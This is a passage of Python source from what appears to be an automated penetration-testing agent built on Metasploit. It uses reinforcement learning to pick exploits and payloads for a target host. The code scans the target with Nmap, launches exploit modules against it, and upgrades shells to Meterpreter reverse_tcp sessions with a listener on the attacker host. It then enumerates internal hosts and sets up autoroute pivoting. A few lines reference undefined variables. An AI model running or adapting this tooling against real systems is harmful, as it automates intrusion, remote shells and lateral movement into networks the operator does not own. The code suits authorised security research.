self.state[ST_MODULE] 833 | prompt_num_mean = len(com_exploit_list) / 2 834 | self.state[ST_MODULE] = (prompt_num - prompt_num_mean) / prompt_num_mean 835 | 836 | # Execute Nmap. 837 | def execute_nmap(self, rhost, command, timeout): 838 | self.util.print_message(NOTE, 'Execute Nmap against {}'.format(rhost)) 839 | if os.path.exists(os.path.join(self.data_path, 'target_info_' + rhost + '.json')) is False: 840 | # Execute Nmap. 841 | self.util.print_message(OK, '{}'.format(command)) 842 | self.util.print_message(OK, 'Start time: {}'.format(self.util.get_current_date())) 843 | _ = self.client.call('console.write', [self.client.console_id, command]) 844 | 845 | time.sleep(3.0) 846 | time_count = 0 847 | while True: 848 | # Judgement of Nmap finishing. 849 | ret = self.client.call('console.read', [self.client.console_id]) 850 | try: 851 | if (time_count % 5) == 0: 852 | self.util.print_message(OK, 'Port scanning: {} [Elapsed time: {} s]'.format(rhost, time_count)) 853 | self.client.keep_alive() 854 | if timeout == time_count: 855 | self.client.termination(self.client.console_id) 856 | self.util.print_message(OK, 'Timeout : {}'.format(command)) 857 | self.util.print_message(OK, 'End time : {}'.format(self.util.get_current_date())) 858 | break 859 | 860 | status = ret.get(b'busy') 861 | if status is False: 862 | self.util.print_message(OK, 'End time : {}'.format(self.util.get_current_date())) 863 | time.sleep(5.0) 864 | break 865 | except Exception as e: 866 | self.util.print_exception(e, 'Failed: {}'.format(command)) 867 | time.sleep(1.0) 868 | time_count += 1 869 | 870 | _ = self.client.call('console.destroy', [self.client.console_id]) 871 | ret = self.client.call('console.create', []) 872 | try: 873 | self.client.console_id = ret.get(b'id') 874 | except Exception as e: 875 | self.util.print_exception(e, 'Failed: console.create') 876 | exit(1) 877 | _ = self.client.call('console.read', [self.client.console_id]) 878 | else: 879 | self.util.print_message(OK, 'Nmap already scanned.') 880 | 881 | # Get port list from Nmap's XML result. 882 | def get_port_list(self, nmap_result_file, rhost): 883 | self.util.print_message(NOTE, 'Get port list from {}.'.format(nmap_result_file)) 884 | global com_port_list 885 | port_list = [] 886 | proto_list = [] 887 | info_list = [] 888 | if os.path.exists(os.path.join(self.data_path, 'target_info_' + rhost + '.json')) is False: 889 | nmap_result = '' 890 | cat_cmd = 'cat ' + nmap_result_file + '\n' 891 | _ = self.client.call('console.write', [self.client.console_id, cat_cmd]) 892 | time.sleep(3.0) 893 | time_count = 0 894 | while True: 895 | # Judgement of 'services' command finishing. 896 | ret = self.client.call('console.read', [self.client.console_id]) 897 | try: 898 | if self.timeout == time_count: 899 | self.client.termination(self.client.console_id) 900 | self.util.print_message(OK, 'Timeout: "{}"'.format(cat_cmd)) 901 | break 902 | 903 | nmap_result += ret.get(b'data').decode('utf-8') 904 | status = ret.get(b'busy') 905 | if status is False: 906 | break 907 | except Exception as e: 908 | self.util.print_exception(e, 'Failed: console.read') 909 | time.sleep(1.0) 910 | time_count += 1 911 | 912 | # Get port, protocol, information from XML file. 913 | port_list = [] 914 | proto_list = [] 915 | info_list = [] 916 | bs = BeautifulSoup(nmap_result, 'lxml') 917 | ports = bs.find_all('port') 918 | for idx, port in enumerate(ports): 919 | port_list.append(str(port.attrs['portid'])) 920 | proto_list.append(port.attrs['protocol']) 921 | 922 | for obj_child in port.contents: 923 | if obj_child.name == 'service': 924 | temp_info = '' 925 | if 'product' in obj_child.attrs: 926 | temp_info += obj_child.attrs['product'] + ' ' 927 | if 'version' in obj_child.attrs: 928 | temp_info += obj_child.attrs['version'] + ' ' 929 | if 'extrainfo' in obj_child.attrs: 930 | temp_info += obj_child.attrs['extrainfo'] 931 | if temp_info != '': 932 | info_list.append(temp_info) 933 | else: 934 | info_list.append('unknown') 935 | # Display getting port information. 936 | self.util.print_message(OK, 'Getting {}/{} info: {}'.format(str(port.attrs['portid']), 937 | port.attrs['protocol'], 938 | info_list[idx])) 939 | 940 | if len(port_list) == 0: 941 | self.util.print_message(WARNING, 'No open port.') 942 | self.util.print_message(WARNING, 'Shutdown Deep Exploit...') 943 | self.client.termination(self.client.console_id) 944 | exit(1) 945 | 946 | # Update com_port_list. 947 | com_port_list = port_list 948 | 949 | # Get OS name from XML file. 950 | some_os = bs.find_all('osmatch') 951 | os_name = 'unknown' 952 | for obj_os in some_os: 953 | for obj_child in obj_os.contents: 954 | if obj_child.name == 'osclass' and 'osfamily' in obj_child.attrs: 955 | os_name = (obj_child.attrs['osfamily']).lower() 956 | break 957 | 958 | # Set OS to state. 959 | for (idx, os_type) in enumerate(self.os_type): 960 | if os_name in os_type: 961 | self.os_real = idx 962 | else: 963 | # Get target host information from local file. 964 | saved_file = os.path.join(self.data_path, 'target_info_' + rhost + '.json') 965 | self.util.print_message(OK, 'Loaded target tree from : {}'.format(saved_file)) 966 | fin = codecs.open(saved_file, 'r', 'utf-8') 967 | target_tree = json.loads(fin.read().replace('\0', '')) 968 | fin.close() 969 | key_list = list(target_tree.keys()) 970 | for key in key_list[2:]: 971 | port_list.append(str(key)) 972 | 973 | # Update com_port_list. 974 | com_port_list = port_list 975 | 976 | return port_list, proto_list, info_list 977 | 978 | # Get Exploit module list. 979 | def get_exploit_list(self): 980 | self.util.print_message(NOTE, 'Get exploit list.') 981 | all_exploit_list = [] 982 | if os.path.exists(os.path.join(self.data_path, 'exploit_list.csv')) is False: 983 | self.util.print_message(OK, 'Loading exploit list from Metasploit.') 984 | 985 | # Get Exploit module list. 986 | all_exploit_list = [] 987 | exploit_candidate_list = self.client.get_module_list('exploit') 988 | for idx, exploit in enumerate(exploit_candidate_list): 989 | module_info = self.client.get_module_info('exploit', exploit) 990 | time.sleep(0.1) 991 | try: 992 | rank = module_info[b'rank'].decode('utf-8') 993 | if rank in {'excellent', 'great', 'good'}: 994 | all_exploit_list.append(exploit) 995 | self.util.print_message(OK, '{}/{} Loaded exploit: {}'.format(str(idx + 1), 996 | len(exploit_candidate_list), 997 | exploit)) 998 | else: 999 | self.util.print_message(WARNING, '{}/{} {} module is danger (rank: {}). Can\'t load.' 1000 | .format(str(idx + 1), len(exploit_candidate_list), exploit, rank)) 1001 | except Exception as e: 1002 | self.util.print_exception(e, 'Failed: module.info') 1003 | exit(1) 1004 | 1005 | # Save Exploit module list to local file. 1006 | self.util.print_message(OK, 'Total loaded exploit module: {}'.format(str(len(all_exploit_list)))) 1007 | fout = codecs.open(os.path.join(self.data_path, 'exploit_list.csv'), 'w', 'utf-8') 1008 | for item in all_exploit_list: 1009 | fout.write(item + '\n') 1010 | fout.close() 1011 | self.util.print_message(OK, 'Saved exploit list.') 1012 | else: 1013 | # Get exploit module list from local file. 1014 | local_file = os.path.join(self.data_path, 'exploit_list.csv') 1015 | self.util.print_message(OK, 'Loaded exploit list from : {}'.format(local_file)) 1016 | fin = codecs.open(local_file, 'r', 'utf-8') 1017 | for item in fin: 1018 | all_exploit_list.append(item.rstrip('\n')) 1019 | fin.close() 1020 | return all_exploit_list 1021 | 1022 | # Get payload list. 1023 | def get_payload_list(self, module_name='', target_num=''): 1024 | self.util.print_message(NOTE, 'Get payload list.') 1025 | all_payload_list = [] 1026 | if os.path.exists(os.path.join(self.data_path, 'payload_list.csv')) is False or module_name != '': 1027 | self.util.print_message(OK, 'Loading payload list from Metasploit.') 1028 | 1029 | # Get payload list. 1030 | payload_list = [] 1031 | if module_name == '': 1032 | # Get all Payloads. 1033 | payload_list = self.client.get_module_list('payload') 1034 | 1035 | # Save payload list to local file. 1036 | fout = codecs.open(os.path.join(self.data_path, 'payload_list.csv'), 'w', 'utf-8') 1037 | for idx, item in enumerate(payload_list): 1038 | time.sleep(0.1) 1039 | self.util.print_message(OK, '{}/{} Loaded payload: {}'.format(str(idx + 1), 1040 | len(payload_list), 1041 | item)) 1042 | fout.write(item + '\n') 1043 | fout.close() 1044 | self.util.print_message(OK, 'Saved payload list.') 1045 | elif target_num == '': 1046 | # Get payload that compatible exploit module. 1047 | payload_list = self.client.get_compatible_payload_list(module_name) 1048 | else: 1049 | # Get payload that compatible target. 1050 | payload_list = self.client.get_target_compatible_payload_list(module_name, target_num) 1051 | else: 1052 | # Get payload list from local file. 1053 | local_file = os.path.join(self.data_path, 'payload_list.csv') 1054 | self.util.print_message(OK, 'Loaded payload list from : {}'.format(local_file)) 1055 | payload_list = [] 1056 | fin = codecs.open(local_file, 'r', 'utf-8') 1057 | for item in fin: 1058 | payload_list.append(item.rstrip('\n')) 1059 | fin.close() 1060 | return payload_list 1061 | 1062 | # Reset state (s). 1063 | def reset_state(self, exploit_tree, target_tree): 1064 | # Randomly select target port number. 1065 | port_num = str(com_port_list[random.randint(0, len(com_port_list) - 1)]) 1066 | service_name = target_tree[port_num]['prod_name'] 1067 | if service_name == 'unknown': 1068 | return True, None, None, None, None 1069 | 1070 | # Initialize state. 1071 | self.state = [] 1072 | 1073 | # Set os type to state. 1074 | self.os_real = target_tree['os_type'] 1075 | self.state.insert(ST_OS_TYPE, target_tree['os_type']) 1076 | self.normalization(ST_OS_TYPE) 1077 | 1078 | # Set product name (index) to state. 1079 | for (idx, service) in enumerate(self.service_list): 1080 | if service == service_name: 1081 | self.state.insert(ST_SERV_NAME, idx) 1082 | break 1083 | self.normalization(ST_SERV_NAME) 1084 | 1085 | # Set version to state. 1086 | self.state.insert(ST_SERV_VER, target_tree[port_num]['version']) 1087 | 1088 | # Set exploit module type (index) to state. 1089 | module_list = target_tree[port_num]['exploit'] 1090 | 1091 | # Randomly select exploit module. 1092 | module_name = '' 1093 | module_info = [] 1094 | while True: 1095 | module_name = module_list[random.randint(0, len(module_list) - 1)] 1096 | for (idx, exploit) in enumerate(com_exploit_list): 1097 | exploit = 'exploit/' + exploit 1098 | if exploit == module_name: 1099 | self.state.insert(ST_MODULE, idx) 1100 | break 1101 | self.normalization(ST_MODULE) 1102 | break 1103 | 1104 | # Randomly select target. 1105 | module_name = module_name[8:] 1106 | target_list = exploit_tree[module_name]['target_list'] 1107 | targets_num = target_list[random.randint(0, len(target_list) - 1)] 1108 | self.state.insert(ST_TARGET, int(targets_num)) 1109 | 1110 | # Set exploit stage to state. 1111 | # self.state.insert(ST_STAGE, S_NORMAL) 1112 | 1113 | # Set target information for display. 1114 | target_info = {'protocol': target_tree[port_num]['protocol'], 1115 | 'target_path': target_tree[port_num]['target_path'], 'prod_name': service_name, 1116 | 'version': target_tree[port_num]['version'], 'exploit': module_name} 1117 | if com_indicate_flag: 1118 | port_num = target_tree['origin_port'] 1119 | target_info['port'] = str(port_num) 1120 | 1121 | return False, self.state, exploit_tree[module_name]['targets'][targets_num], target_list, target_info 1122 | 1123 | # Get state (s). 1124 | def get_state(self, exploit_tree, target_tree, port_num, exploit, target): 1125 | # Get product name. 1126 | service_name = target_tree[port_num]['prod_name'] 1127 | if service_name == 'unknown': 1128 | return True, None, None, None 1129 | 1130 | # Initialize state. 1131 | self.state = [] 1132 | 1133 | # Set os type to state. 1134 | self.os_real = target_tree['os_type'] 1135 | self.state.insert(ST_OS_TYPE, target_tree['os_type']) 1136 | self.normalization(ST_OS_TYPE) 1137 | 1138 | # Set product name (index) to state. 1139 | for (idx, service) in enumerate(self.service_list): 1140 | if service == service_name: 1141 | self.state.insert(ST_SERV_NAME, idx) 1142 | break 1143 | self.normalization(ST_SERV_NAME) 1144 | 1145 | # Set version to state. 1146 | self.state.insert(ST_SERV_VER, target_tree[port_num]['version']) 1147 | 1148 | # Select exploit module (index). 1149 | for (idx, temp_exploit) in enumerate(com_exploit_list): 1150 | temp_exploit = 'exploit/' + temp_exploit 1151 | if exploit == temp_exploit: 1152 | self.state.insert(ST_MODULE, idx) 1153 | break 1154 | self.normalization(ST_MODULE) 1155 | 1156 | # Select target. 1157 | self.state.insert(ST_TARGET, int(target)) 1158 | 1159 | # Set exploit stage to state. 1160 | # self.state.insert(ST_STAGE, S_NORMAL) 1161 | 1162 | # Set target information for display. 1163 | target_info = {'protocol': target_tree[port_num]['protocol'], 1164 | 'target_path': target_tree[port_num]['target_path'], 1165 | 'prod_name': service_name, 'version': target_tree[port_num]['version'], 1166 | 'exploit': exploit[8:], 'target': target} 1167 | if com_indicate_flag: 1168 | port_num = target_tree['origin_port'] 1169 | target_info['port'] = str(port_num) 1170 | 1171 | return False, self.state, exploit_tree[exploit[8:]]['targets'][target], target_info 1172 | 1173 | # Get available payload list (convert from string to number). 1174 | def get_available_actions(self, payload_list): 1175 | payload_num_list = [] 1176 | for self_payload in payload_list: 1177 | for (idx, payload) in enumerate(com_payload_list): 1178 | if payload == self_payload: 1179 | payload_num_list.append(idx) 1180 | break 1181 | return payload_num_list 1182 | 1183 | # Show banner of successfully exploitation. 1184 | def show_banner_bingo(self, prod_name, exploit, payload, sess_type, delay_time=2.0): 1185 | metric = {'service': [], 1186 | 'time': []} 1187 | banner = u""" 1188 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 1189 |     ██████╗ ██╗███╗ ██╗ ██████╗ ██████╗ ██╗██╗██╗ 1190 | ██╔══██╗██║████╗ ██║██╔════╝ ██╔═══██╗██║██║██║ 1191 | ██████╔╝██║██╔██╗ ██║██║ ███╗██║ ██║██║██║██║ 1192 | ██╔══██╗██║██║╚██╗██║██║ ██║██║ ██║╚═╝╚═╝╚═╝ 1193 | ██████╔╝██║██║ ╚████║╚██████╔╝╚██████╔╝██╗██╗██╗ 1194 | ╚═════╝ ╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚═════╝ ╚═╝╚═╝╚═╝ 1195 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 1196 | """ + prod_name + ' ' + exploit + ' ' + payload + ' ' + sess_type + '\n' 1197 | self.util.print_message(NONE, banner) 1198 | message = 'bingo!! ' 1199 | metric['service'].append(prod_name) 1200 | bingotime = time.time() - t1 1201 | metric['time'].append(bingotime) 1202 | dataframe = pd.DataFrame(metric) 1203 | dataframe.to_csv(file, mode='a') 1204 | #time.sleep(delay_time) 1205 | 1206 | # Set Metasploit options. 1207 | def set_options(self, target_info, target, selected_payload, exploit_tree): 1208 | options = exploit_tree[target_info['exploit']]['options'] 1209 | key_list = options.keys() 1210 | option = {} 1211 | for key in key_list: 1212 | if options[key]['required'] is True: 1213 | sub_key_list = options[key].keys() 1214 | if 'default' in sub_key_list: 1215 | # If "user_specify" is not null, set "user_specify" value to the key. 1216 | if options[key]['user_specify'] == '': 1217 | option[key] = options[key]['default'] 1218 | else: 1219 | option[key] = options[key]['user_specify'] 1220 | else: 1221 | option[key] = '0' 1222 | 1223 | # Set target path/uri/dir etc. 1224 | if len([s for s in self.path_collection if s in key.lower()]) != 0: 1225 | option[key] = target_info['target_path'] 1226 | 1227 | option['RHOST'] = self.rhost 1228 | if self.port_div_symbol in target_info['port']: 1229 | tmp_port = target_info['port'].split(self.port_div_symbol) 1230 | option['RPORT'] = int(tmp_port[0]) 1231 | else: 1232 | option['RPORT'] = int(target_info['port']) 1233 | option['TARGET'] = int(target) 1234 | if selected_payload != '': 1235 | option['PAYLOAD'] = selected_payload 1236 | return option 1237 | 1238 | # Execute exploit. 1239 | def execute_exploit(self, action, thread_name, thread_type, target_list, target_info, step, exploit_tree, frame=0): 1240 | metric = {'state': [], 1241 | 'action': []} 1242 | # Set target. 1243 | target = '' 1244 | if thread_type == 'learning': 1245 | target = str(self.state[ST_TARGET]) 1246 | else: 1247 | # If testing, 'target_list' is target number (not list). 1248 | target = target_list 1249 | # If trial exceed maximum number of trials, finish trial at current episode. 1250 | if step > self.max_attempt - 1: 1251 | return self.state, None, True, {} 1252 | 1253 | # Set payload. 1254 | selected_payload = '' 1255 | if action != 'no payload': 1256 | selected_payload = com_payload_list[action] 1257 | else: 1258 | # No payload 1259 | selected_payload = '' 1260 | 1261 | # Set options. 1262 | option = self.set_options(target_info, target, selected_payload, exploit_tree) 1263 | 1264 | # Execute exploit. 1265 | reward = 0 1266 | message = '' 1267 | session_list = {} 1268 | done = False 1269 | job_id, uuid = self.client.execute_module('exploit', target_info['exploit'], option) 1270 | if uuid is not None: 1271 | # Check status of running module. 1272 | _ = self.check_running_module(job_id, uuid) 1273 | sessions = self.client.get_session_list() 1274 | key_list = sessions.keys() 1275 | if len(key_list) != 0: 1276 | # Probably successfully of exploitation (but unsettled). 1277 | for key in key_list: 1278 | exploit_uuid = sessions[key][b'exploit_uuid'].decode('utf-8') 1279 | if uuid == exploit_uuid: 1280 | # Successfully of exploitation. 1281 | session_id = int(key) 1282 | session_type = sessions[key][b'type'].decode('utf-8') 1283 | session_port = str(sessions[key][b'session_port']) 1284 | session_exploit = sessions[key][b'via_exploit'].decode('utf-8') 1285 | session_payload = sessions[key][b'via_payload'].decode('utf-8') 1286 | module_info = self.client.get_module_info('exploit', session_exploit) 1287 | 1288 | # Checking feasibility of post-exploitation. 1289 | # status, server_job_id, new_session_id = self.check_post_exploit(session_id, session_type) 1290 | # status = self.check_payload_type(session_payload, session_type) 1291 | status = True 1292 | 1293 | if status: 1294 | # Successful of post-exploitation. 1295 | reward = R_GREAT 1296 | done = True 1297 | message = 'bingo!! ' 1298 | 1299 | # Display banner. 1300 | self.show_banner_bingo(target_info['prod_name'], 1301 | session_exploit, 1302 | session_payload, 1303 | session_type) 1304 | else: 1305 | # Failure of post-exploitation. 1306 | reward = R_GOOD 1307 | message = 'misfire ' 1308 | 1309 | # Gather reporting items. 1310 | vuln_name = module_info[b'name'].decode('utf-8') 1311 | description = module_info[b'description'].decode('utf-8') 1312 | ref_list = module_info[b'references'] 1313 | reference = '' 1314 | for item in ref_list: 1315 | reference += '[' + item[0].decode('utf-8') + ']' + '@' + item[1].decode('utf-8') + '@@' 1316 | 1317 | # Save reporting item for report. 1318 | if thread_type == 'learning': 1319 | with codecs.open(os.path.join(self.report_train_path, 1320 | thread_name + '.csv'), 'a', 'utf-8') as fout: 1321 | bingo = [self.util.get_current_date(), 1322 | self.rhost, 1323 | session_port, 1324 | target_info['protocol'], 1325 | target_info['prod_name'], 1326 | str(target_info['version']), 1327 | vuln_name, 1328 | description, 1329 | session_type, 1330 | session_exploit, 1331 | target, 1332 | session_payload, 1333 | reference] 1334 | writer = csv.writer(fout) 1335 | writer.writerow(bingo) 1336 | else: 1337 | with codecs.open(os.path.join(self.report_test_path, 1338 | thread_name + '.csv'), 'a', 'utf-8') as fout: 1339 | bingo = [self.util.get_current_date(), 1340 | self.rhost, 1341 | session_port, 1342 | self.source_host, 1343 | target_info['protocol'], 1344 | target_info['prod_name'], 1345 | str(target_info['version']), 1346 | vuln_name, 1347 | description, 1348 | session_type, 1349 | session_exploit, 1350 | target, 1351 | session_payload, 1352 | reference] 1353 | writer = csv.writer(fout) 1354 | writer.writerow(bingo) 1355 | 1356 | # Shutdown multi-handler for post-exploitation. 1357 | # if server_job_id is not None: 1358 | # self.client.stop_job(server_job_id) 1359 | 1360 | # Disconnect session. 1361 | if thread_type == 'learning': 1362 | self.client.stop_session(session_id) 1363 | # self.client.stop_session(new_session_id) 1364 | self.client.stop_meterpreter_session(session_id) 1365 | # self.client.stop_meterpreter_session(new_session_id) 1366 | # Create session list for post-exploitation. 1367 | else: 1368 | # self.client.stop_session(new_session_id) 1369 | # self.client.stop_meterpreter_session(new_session_id) 1370 | session_list['id'] = session_id 1371 | session_list['type'] = session_type 1372 | session_list['port'] = session_port 1373 | session_list['exploit'] = session_exploit 1374 | session_list['target'] = target 1375 | session_list['payload'] = session_payload 1376 | break 1377 | else: 1378 | # Failure exploitation. 1379 | reward = R_BAD 1380 | message = 'failure ' 1381 | else: 1382 | # Failure exploitation. 1383 | reward = R_BAD 1384 | message = 'failure ' 1385 | else: 1386 | # Time out or internal error of Metasploit. 1387 | done = True 1388 | reward = R_BAD 1389 | message = 'time out' 1390 | 1391 | # Output result to console. 1392 | if thread_type == 'learning': 1393 | self.util.print_message(OK, '{0:04d}/{1:04d} : {2:03d}/{3:03d} {4} reward:{5} {6} {7} ({8}/{9}) ' 1394 | '{10} | {11} | {12} | {13}'.format(frame, 1395 | MAX_TRAIN_NUM, 1396 | step, 1397 | MAX_STEPS, 1398 | thread_name, 1399 | str(reward), 1400 | message, 1401 | self.rhost, 1402 | target_info['protocol'], 1403 | target_info['port'], 1404 | target_info['prod_name'], 1405 | target_info['exploit'], 1406 | selected_payload, 1407 | target)) 1408 | else: 1409 | self.util.print_message(OK, '{0}/{1} {2} {3} ({4}/{5}) ' 1410 | '{6} | {7} | {8} | {9}'.format(step+1, 1411 | self.max_attempt, 1412 | message, 1413 | self.rhost, 1414 | target_info['protocol'], 1415 | target_info['port'], 1416 | target_info['prod_name'], 1417 | target_info['exploit'], 1418 | selected_payload, 1419 | target)) 1420 | 1421 | # Set next stage of exploitation. 1422 | targets_num = 0 1423 | if thread_type == 'learning' and len(target_list) != 0: 1424 | targets_num = random.randint(0, len(target_list) - 1) 1425 | self.state[ST_TARGET] = targets_num 1426 | ''' 1427 | if thread_type == 'learning' and len(target_list) != 0: 1428 | if reward == R_BAD and self.state[ST_STAGE] == S_NORMAL: 1429 | # Change status of target. 1430 | self.state[ST_TARGET] = random.randint(0, len(target_list) - 1) 1431 | elif reward == R_GOOD: 1432 | # Change status of exploitation stage (Fix target). 1433 | self.state[ST_STAGE] = S_EXPLOIT 1434 | else: 1435 | # Change status of post-exploitation stage (Goal). 1436 | self.state[ST_STAGE] = S_PEXPLOIT 1437 | ''' 1438 | 1439 | return self.state, reward, done, session_list 1440 | 1441 | # Check possibility of post exploit. 1442 | def check_post_exploit(self, session_id, session_type): 1443 | new_session_id = 0 1444 | status = False 1445 | job_id = None 1446 | if session_type == 'shell' or session_type == 'powershell': 1447 | # Upgrade session from shell to meterpreter. 1448 | upgrade_result, job_id, lport = self.upgrade_shell(session_id) 1449 | if upgrade_result == 'success': 1450 | sessions = self.client.get_session_list() 1451 | session_list = list(sessions.keys()) 1452 | for sess_idx in session_list: 1453 | if session_id < sess_idx and sessions[sess_idx][b'type'].lower() == b'meterpreter': 1454 | status = True 1455 | new_session_id = sess_idx 1456 | break 1457 | else: 1458 | status = False 1459 | elif session_type == 'meterpreter': 1460 | status = True 1461 | else: 1462 | status = False 1463 | return status, job_id, new_session_id 1464 | 1465 | # Check payload type. 1466 | def check_payload_type(self, session_payload, session_type): 1467 | status = None 1468 | if session_type == 'shell' or session_type == 'powershell': 1469 | # Check type: singles, stagers, stages 1470 | if session_payload.count('/') > 1: 1471 | # Stagers, Stages. 1472 | status = True 1473 | else: 1474 | # Singles. 1475 | status = False 1476 | elif session_type == 'meterpreter': 1477 | status = True 1478 | else: 1479 | status = False 1480 | return status 1481 | 1482 | # Execute post exploit. 1483 | def execute_post_exploit(self, session_id, session_type): 1484 | internal_ip_list = [] 1485 | if session_type == 'shell' or session_type == 'powershell': 1486 | # Upgrade session from shell to meterpreter. 1487 | upgrade_result, _, _ = self.upgrade_shell(session_id) 1488 | if upgrade_result == 'success': 1489 | sessions = self.client.get_session_list() 1490 | session_list = list(sessions.keys()) 1491 | for sess_idx in session_list: 1492 | if session_id < sess_idx and sessions[sess_idx][b'type'].lower() == b'meterpreter': 1493 | self.util.print_message(NOTE, 'Successful: Upgrade.') 1494 | session_id = sess_idx 1495 | 1496 | # Search other servers in internal network. 1497 | internal_ip_list, _ = self.get_internal_ip(session_id) 1498 | if len(internal_ip_list) == 0: 1499 | self.util.print_message(WARNING, 'Internal server is not found.') 1500 | else: 1501 | # Pivoting. 1502 | self.util.print_message(OK, 'Internal server list.\n{}'.format(internal_ip_list)) 1503 | self.set_pivoting(session_id, internal_ip_list) 1504 | break 1505 | else: 1506 | self.util.print_message(WARNING, 'Failure: Upgrade session from shell to meterpreter.') 1507 | elif session_type == 'meterpreter': 1508 | # Search other servers in internal network. 1509 | internal_ip_list, _ = self.get_internal_ip(session_id) 1510 | if len(internal_ip_list) == 0: 1511 | self.util.print_message(WARNING, 'Internal server is not found.') 1512 | else: 1513 | # Pivoting. 1514 | self.util.print_message(OK, 'Internal server list.\n{}'.format(internal_ip_list)) 1515 | self.set_pivoting(session_id, internal_ip_list) 1516 | else: 1517 | self.util.print_message(WARNING, 'Unknown session type: {}.'.format(session_type)) 1518 | return internal_ip_list 1519 | 1520 | # Upgrade session from shell to meterpreter. 1521 | def upgrade_shell(self, session_id): 1522 | # Upgrade shell session to meterpreter. 1523 | self.util.print_message(NOTE, 'Upgrade session from shell to meterpreter.') 1524 | payload = '' 1525 | # TODO: examine payloads each OS systems. 1526 | if self.os_real == 0: 1527 | payload = 'windows/meterpreter/reverse_tcp' 1528 | elif self.os_real == 3: 1529 | payload = 'osx/x64/meterpreter_reverse_tcp' 1530 | else: 1531 | payload = 'linux/x86/meterpreter_reverse_tcp' 1532 | 1533 | # Launch multi handler. 1534 | module = 'exploit/multi/handler' 1535 | lport = random.randint(10001, 65535) 1536 | option = {'LHOST': self.lhost, 'LPORT': lport, 'PAYLOAD': payload, 'TARGET': 0} 1537 | job_id, uuid = self.client.execute_module('exploit', module, option) 1538 | time.sleep(0.5) 1539 | if uuid is None: 1540 | self.util.print_message(FAIL, 'Failure executing module: {}'.format(module)) 1541 | return 'failure', job_id, lport 1542 | 1543 | # Execute upgrade. 1544 | status = self.client.upgrade_shell_session(session_id, self.lhost, lport) 1545 | return status, job_id, lport 1546 | 1547 | # Check status of running module. 1548 | def check_running_module(self, job_id, uuid): 1549 | # Waiting job to finish. 1550 | time_count = 0 1551 | while True: 1552 | job_id_list = self.client.get_job_list() 1553 | if job_id in job_id_list: 1554 | time.sleep(1) 1555 | else: 1556 | return True 1557 | if self.timeout == time_count: 1558 | self.client.stop_job(str(job_id)) 1559 | self.util.print_message(WARNING, 'Timeout: job_id={}, uuid={}'.format(job_id, uuid)) 1560 | return False 1561 | time_count += 1 1562 | 1563 | # Get internal ip addresses. 1564 | def get_internal_ip(self, session_id): 1565 | # Execute "arp" of Meterpreter command. 1566 | self.util.print_message(OK, 'Searching internal servers...') 1567 | cmd = 'arp\n' 1568 | _ = self.client.execute_meterpreter(session_id, cmd) 1569 | time.sleep(3.0) 1570 | data = self.client.get_meterpreter_result(session_id) 1571 | if (data is None) or ('unknown command' in data.lower()): 1572 | self.util.print_message(FAIL, 'Failed: Get meterpreter result') 1573 | return [], False 1574 | self.util.print_message(OK, 'Result of arp: \n{}'.format(data)) 1575 | regex_pattern = r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}).*[a-z0-9]{2}:[a-z0-9]{2}:[a-z0-9]{2}:[a-z0-9]{2}' 1576 | temp_list = self.cutting_strings(regex_pattern, data) 1577 | internal_ip_list = [] 1578 | for ip_addr in temp_list: 1579 | if ip_addr != self.lhost: 1580 | internal_ip_list.append(ip_addr) 1581 | return list(set(internal_ip_list)), True 1582 | 1583 | # Get subnet masks. 1584 | def get_subnet(self, session_id, internal_ip): 1585 | cmd = 'run get_local_subnets\n' 1586 | _ = self.client.execute_meterpreter(session_id, cmd) 1587 | time.sleep(3.0) 1588 | data = self.client.get_meterpreter_result(session_id) 1589 | if data is not None: 1590 | self.util.print_message(OK, 'Result of get_local_subnets: \n{}'.format(data)) 1591 | regex_pattern = r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' 1592 | temp_subnet = self.cutting_strings(regex_pattern, data) 1593 | try: 1594 | subnets = temp_subnet[0].split('/') 1595 | return [subnets[0], subnets[1]] 1596 | except Exception as e: 1597 | self.util.print_exception(e, 'Failed: {}'.format(cmd)) 1598 | return ['.'.join(internal_ip.split('.')[:3]) + '.0', '255.255.255.0'] 1599 | else: 1600 | self.util.print_message(WARNING, '"{}" is failure.'.format(cmd)) 1601 | return ['.'.join(internal_ip.split('.')[:3]) + '.0', '255.255.255.0'] 1602 | 1603 | # Set pivoting using autoroute. 1604 | def set_pivoting(self, session_id, ip_list): 1605 | # Get subnet of target internal network. 1606 | temp_subnet = [] 1607 | for internal_ip in ip_list: 1608 | # Execute an autoroute command. 1609 | temp_subnet.append(self.get_subnet(session_id, internal_ip)) 1610 | 1611 | # Execute autoroute. 1612 | for subnet in list(map(list, set(map(tuple, temp_subnet)))): 1613 | cmd = 'run autoroute -s ' + subnet[0] + ' ' + subnet[1] + '\n' 1614 | _ = self.client.execute_meterpreter(session_id, cmd) 1615 | time.sleep(3.0) 1616 | _ = self.client.execute_meterpreter(session_id, 'run autoroute -p\n') 1617 | 1618 | 1619 | # Constants of LocalBrain 1620 | MIN_BATCH = 5 1621 | LOSS_V = .05 # v loss coefficient 1622 | LOSS_ENTROPY = .001 # entropy coefficient 1623 | LEARNING_RATE = 1e-4 1624 | RMSPropDecaly = 0.99 1625 | 1626 | # Params of advantage (Bellman equation) 1627 | GAMMA = 0.95 1628 | N_STEP_RETURN = 5 1629 | GAMMA_N = GAMMA ** N_STEP_RETURN 1630 | clip_value = 0.2 1631 | c_1 = 0.1 1632 | c_2 = 0.01 1633 | TRAIN_WORKERS = 10 # Thread number of learning. 1634 | TEST_WORKER = 1 # Thread number of testing (default 1) 1635 | MAX_STEPS = 30 # Maximum step number. 1636 | MAX_TRAIN_NUM = 100000 # Learning number of each thread. 1637 | Tmax = 5 # Updating step period of each thread. 1638 | EPSILON = 0.2 1639 | # Params of epsilon greedy 1640 | EPS_START = 0.5 1641 | EPS_END = 0.0 1642 | 1643 | 1644 | # ParameterServer 1645 | class ParameterServer: 1646 | def __init__(self): 1647 | # Identify by name to weights by the thread name (Name Space). 1648 | with tf.variable_scope("parameter_server"): 1649 | # Define neural network. 1650 | self.model = self._build_model() 1651 | 1652 | # Declare server params. 1653 | self.weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="parameter_server") 1654 | # Define optimizer. 1655 | self.optimizer = tf.train.RMSPropOptimizer(LEARNING_RATE, RMSPropDecaly) 